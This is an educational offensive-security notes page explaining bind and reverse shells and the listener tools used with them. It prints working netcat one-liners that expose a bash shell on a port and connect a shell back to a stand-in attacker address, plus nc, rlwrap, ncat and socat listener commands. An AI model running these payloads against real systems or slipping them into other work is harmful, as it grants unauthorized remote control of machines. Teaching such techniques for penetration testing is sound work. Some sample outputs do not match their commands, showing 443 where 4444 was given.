0xnhl

Shells

/ Update
8 min read

shell is a utility (software) that acts as an interface between a user and the operating system (the kernel and its services).

  • It can be a graphical interface, but it is usually a command-line interface, and this will depend on the operating system running on the target system.
  • For example, in Linux there are several shell environments, such as Bash, ksh, and tcsh.
  • Traditionally, in Windows the shell is the command prompt (command-line interface), which is invoked by cmd.exe. Windows PowerShell is a newer Microsoft shell that combines the old CMD functionality with a new scripting/cmdlet instruction set with built-in system administration functionality. PowerShell cmdlets allow users and administrators to automate complicated tasks with reusable scripts.

In cyber security, it commonly refers to a specific shell session an attacker uses when accessing a compromised system, allowing them to run commands and execute software. This will allow attackers to execute several activities, some of which are described below.

  • Remote System Control: allows the attacker to execute commands or software remotely in the target system.
  • Privilege Escalation: If initial access through a shell is limited or restricted, attackers can explore ways to escalate privileges to more elevated or administrative access.
  • Data Exfiltration: Once attackers have access to execute commands through an obtained shell, they can explore the system to read and copy sensitive data from it.
  • Persistence and Maintenance Access: Once shell access is obtained, attackers can create access through users and credentials or copy backdoor software to maintain access to the target system for later usage.
  • Post-Exploitation Activities: After access to a shell is granted, attackers can perform a wide range of post-exploitation activities, such as deploying malware, creating hidden accounts, and deleting information.
  • Access Other Systems on the Network: Depending on the attacker’s intentions, the obtained shell can be just an initial access point. The goal can be to hop through the network to a different target using the obtained shell as a pivot to different points in the compromised system network. This is also known as pivoting.

Bind shell#

With a bind shell, an attacker opens a port or a listener on the compromised system and waits for a connection. when this connection occurs, it exposes the shell session so the attacker can execute commands remotely.
This is done in order to connect to the victim from any system and execute commands and further manipulate the victim.

Setting Up the Bind Shell on the Target#

Let’s create a bind shell. In this case, the attacker can use a command like the one below on the victim’s machine:

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f
plaintext

Explanation of the Payload

  • rm -f /tmp/f - This command removes any existing named pipe file located at /tmp/f/. This ensures that the script can create a new named pipe without conflicts.
  • mkfifo /tmp/f - This command creates a named pipe, or FIFO, at /tmp/f. Named pipes allow for two-way communication between processes. In this context, it acts as a conduit for input and output.
  • cat /tmp/f - This command reads data from the named pipe. It waits for input that can be sent through the pipe.
  • | bash -i 2>&1 - The output of cat is piped to a shell instance (bash -i), which allows the attacker to execute commands interactively. The 2>&1 redirects standard error to standard output, ensuring error messages are returned to the attacker.
  • | nc -l 0.0.0.0 8080 - Starts Netcat in listen mode (-l) on all interfaces (0.0.0.0) and port 8080. The shell will be exposed to the attacker once they connect to this port.
  • >/tmp/f This final part sends the commands’ output back into the named pipe, allowing for bidirectional communication.
    The command above will listen for incoming connections and expose a bash shell. We need to note that ports below 1024 will require Netcat to be executed with elevated privileges. In this case, using port 8080 will avoid this.

Attacker Connects to the Bind Shell#

Now that the victim’s machine is waiting for incoming connections, we can use Netcat again with the following command to connect.

nc -nv TARGET_IP 8080
plaintext

Explanation of the command

  • nc - This invokes Netcat, which establishes the connection to the target.
  • -n - Disables DNS resolution, allowing Netcat to operate faster and avoid unnecessary lookups.
  • -v - Verbose mode provides detailed output of the connection process, such as when the connection is established.
  • TARGET_IP - The IP address of the lab machine where the bind shell is running.
  • 8080 - The port number on which the bind shell listens.
    After connecting, we can get a shell.

Reverse shell#

A reverse shell, sometimes referred to as a “connect back shell,” is when the attacking system has a listener (port open), and the victim initiates a connection back to the attacking system.
The connections initiate from the target system to the attacker’s machine, which can help avoid detection from network firewalls and other security appliances.

Set up a Netcat (nc) Listener#

The attacker’s machine will be waiting for a connection, so let’s use Netcat to listen to a connection using the following command:

nc -lvnp <port>
plaintext

Gaining Reverse Shell Access#

Once we have our listener set, the attacker should execute what is known as a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access granted by the attacker and executes a command that will expose the shell through the network. There’s a variety of payloads that will depend on the tools and OS of the compromised system.

As an example, let’s analyze an example payload named a pipe reverse shell, as shown below.

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f
plaintext

Explanation of the Payload

  • rm -f /tmp/f - This command removes any existing named pipe file located at /tmp/f/. This ensures that the script can create a new named pipe without conflicts.
  • mkfifo /tmp/f - This command creates a named pipe, or FIFO (first-in, first-out), at /tmp/f. Named pipes allow for two-way communication between processes. In this context, it acts as a conduit for input and output.
  • cat /tmp/f - This command reads data from the named pipe. It waits for input that can be sent through the pipe.
  • | bash -i 2>&1 - The output of cat is piped to a shell instance (bash -i), which allows the attacker to execute commands interactively. The 2>&1 redirects standard error to standard output, ensuring that error messages are sent back to the attacker.
  • | nc ATTACKER_IP ATTACKER_PORT >/tmp/f - This part pipes the shell’s output through nc (Netcat) to the attacker’s IP address (ATTACKER_IP) on the attacker’s port (ATTACKER_PORT).
  • >/tmp/f -This final part sends the output of the commands back into the named pipe, allowing for bi-directional communication.
    The payload above can expose the shell bash through the network to the desired listener.

Attacker Receives the Shell#

Once the above payload is executed, the attacker will receive a reverse shell allowing them to execute commands as if they were logged into a regular terminal in the OS.

Tools#

Many tools allow you to create bind and reverse shells from a compromised host. Some of the most popular ones are the Meterpreter module in Metasploit and Netcat. Netcat is one of the best and most versatile tools for pen testers because it is lightweight and very portable.

A utility like Netcat will handle the connection and allow the attacker to interact with the exposed shell, but Netcat is not the only utility that will allow us to do that.
Here are some other tools that can be used as listeners to interact with an incoming shell.

Rlwrap#

It is a small utility that uses the GNU readline library to provide editing keyboard and history.

Usage Example (Enhancing a Netcat Shell With Rlwrap)

attacker@kali:~$ rlwrap nc -lvnp 443
listening on [any] 443 ...
shell

This wraps nc with rlwrap, allowing the use of features like arrow keys and history for better interaction.

Ncat#

Ncat is an improved version of Netcat distributed by the NMAP project. It provides extra features, like encryption (SSL).

Usage Example (Listening for Reverse Shells)

attacker@kali:~$ ncat -lvnp 4444
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
shell

Usage Example (Listening for Reverse Shells with SSL)

attacker@kali:~$ ncat --ssl -lvnp 4444
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: B7AC F999 7FB0 9FF9 14F5 5F12 6A17 B0DC B094 AB7F
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
shell

The --ssl option enables SSL encryption for the listener.

Socat#

It is a utility that allows you to create a socket connection between two data sources, in this case, two different hosts.

Default Usage Example (Listening for Reverse Shell):

attacker@kali:~$ socat -d -d TCP-LISTEN:443 STDOUT
2024/09/23 15:44:38 socat[41135] N listening on AF=2 0.0.0.0:443
shell

The command above used the -d option to enable verbose output; using it again (-d -d) will increase the verbosity of the commands. The TCP-LISTEN:443 option creates a TCP listener on port 443, establishing a server socket for incoming connections. Finally, the STDOUT option directs any incoming data to the terminal.

Shells
https://nahil.xyz/vault/offensive-security/shells/
Author Nahil Rasheed
Published at July 4, 2025
Copyright CC BY-NC-SA 4.0
Disclaimer This content is provided strictly for educational purposes only.

Shell Payloads

Vulns & Attacks